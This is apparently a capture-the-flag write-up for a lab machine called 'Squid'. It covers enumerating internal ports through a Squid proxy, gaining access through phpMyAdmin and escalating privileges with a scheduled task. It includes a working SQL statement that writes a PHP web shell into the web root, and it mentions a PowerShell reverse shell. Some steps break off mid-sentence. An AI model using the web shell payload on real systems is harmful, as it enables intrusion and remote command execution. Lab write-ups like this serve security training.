Squid 🔹

Enumeration

Page at :3128 is the squid proxy error page

We can connect to the proxy for discovering more ports, we can use https://github.com/aancw/spose

┌──(kali㉿kali)-[~/Desktop/spose]
└─$ python3 spose.py --proxy http://192.168.120.223:3128 --target 127.0.0.1
Using proxy address http://192.168.120.223:3128
127.0.0.1 3306 seems OPEN 
127.0.0.1 8080 seems OPEN  

A mysql service and a wamp service. We can access the wamp one with foxy proxy.

Initial Access

Now accessing 8080 we can see the apps, trying root with phpmyadmin

Put a php shell

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/wshell.php';

And can be accessed in the root.

So we can put an encoded powershell reverse shell and

Privilege Escalation

We have restricted permissions, from this resource, we find out that when a LOCAL SERVICE or NETWORK SERVICE is configured to run with a restricted set of privileges, permissions can be recovered by creating a scheduled task. The new process created by the Task Scheduler Service will have all the default privileges of the associated user account.

So creating first a first task

Post Exploitation

Get the flag